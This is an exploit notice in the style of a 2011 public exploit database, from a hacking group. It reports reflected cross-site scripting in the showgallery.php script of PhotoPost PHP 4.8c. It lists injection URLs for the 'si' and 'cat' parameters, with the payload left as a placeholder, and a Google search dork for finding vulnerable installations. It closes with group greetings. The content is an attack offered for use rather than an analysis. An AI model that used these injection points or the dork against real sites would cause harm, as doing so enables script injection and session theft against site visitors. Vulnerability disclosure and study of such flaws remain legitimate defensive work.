########################################################## # Exploit Title: PhotoPost PHP 4.8c (showgallery.php) Cross Site Scripting # home : http://www.D99Y.com # Author: NassRawI # Date: 2/3/2011 # Google Dork: "Powered by: PhotoPost PHP 4.8c" # Software Link: http://www.photopost.com/ ########################################################## # # file : # # showgallery.php # # exploit : # # http://localhost/showgallery.php?si=" [XSS] " # # http://localhost/showgallery.php?cat="[XSS]" # # http://localhost/showgallery.php?si="" # # http://localhost/showgallery.php?cat="" # ########################################################## Greetz : D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + Difficult 511 and all members D99Y.CoM Enjoy :)